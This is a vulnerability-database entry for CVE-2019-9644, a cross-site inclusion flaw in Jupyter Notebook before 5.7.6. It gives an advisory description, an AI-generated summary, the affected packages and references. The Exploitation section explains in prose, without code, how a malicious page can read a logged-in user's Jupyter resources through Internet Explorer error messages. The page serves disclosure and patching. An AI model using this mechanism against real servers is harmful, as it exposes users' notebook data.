CVE-2019-9644
Description
An XSSI (cross-site inclusion) vulnerability in Jupyter Notebook before 5.7.6 allows inclusion of resources on malicious pages when visited by users who are authenticated with a Jupyter server. Access to the content of resources has been demonstrated with Internet Explorer through capturing of error messages, though not reproduced with other browsers. This occurs because Internet Explorer's error messages can include the content of any invalid JavaScript that was encountered.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
An XSSI vulnerability in Jupyter Notebook before 5.7.6 allows authenticated users' resources to be included on malicious pages via Internet Explorer's error messages.
Vulnerability
Jupyter Notebook versions before 5.7.6 contain a cross-site inclusion (XSSI) vulnerability. The bug allows a malicious page to include resources from a Jupyter server when the victim is authenticated to that server. This is possible because Internet Explorer's error messages can include the content of any invalid JavaScript encountered, enabling an attacker to capture the content of included resources. The vulnerability affects all Jupyter Notebook versions prior to 5.7.6. [1][2]
Exploitation
An attacker must host a malicious web page that includes a resource from a Jupyter server (e.g., via a script tag). The victim must be authenticated to that Jupyter server and visit the malicious page using Internet Explorer. The attacker then captures the content of the resource through Internet Explorer's error messages, which reveal the content of invalid JavaScript. The attack does not require any additional user interaction beyond visiting the page. [2]
Impact
Successful exploitation allows an attacker to read the content of resources hosted on the Jupyter server that the victim has access to. This can lead to disclosure of sensitive information, such as notebook contents, configuration files, or other data accessible via the Jupyter server. The attack is limited to Internet Explorer and requires the victim to be authenticated. [2]
Mitigation
The vulnerability is fixed in Jupyter Notebook version 5.7.6, released on March 8, 2019. Users should upgrade to 5.7.6 or later. For users unable to upgrade, a workaround is to avoid using Internet Explorer to access Jupyter servers while authenticated. The fix is available in commit 05aa4b2. [1][4]
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
jupyter-notebookPyPI | < 5.7.6 | 5.7.6 |
notebookPyPI | < 5.7.6 | 5.7.6 |
Affected products
3- ghsa-coords2 versions
< 5.7.6+ 1 more
- (no CPE)range: < 5.7.6
- (no CPE)range: < 5.7.6
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
8- github.com/advisories/GHSA-hhx8-cr55-qcxxghsaADVISORY
- lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UP5RLEES2JBBNSNLBR65XM6PCD4EMF7D/mitrevendor-advisoryx_refsource_FEDORA
- lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VMDPJBVXOVO6LYGAT46VZNHH6JKSCURO/mitrevendor-advisoryx_refsource_FEDORA
- nvd.nist.gov/vuln/detail/CVE-2019-9644ghsaADVISORY
- github.com/jupyter/notebook/compare/f3f00df...05aa4b2ghsax_refsource_MISCWEB
- github.com/pypa/advisory-database/tree/main/vulns/notebook/PYSEC-2019-159.yamlghsaWEB
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UP5RLEES2JBBNSNLBR65XM6PCD4EMF7DghsaWEB
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VMDPJBVXOVO6LYGAT46VZNHH6JKSCUROghsaWEB
News mentions
0No linked articles in our index yet.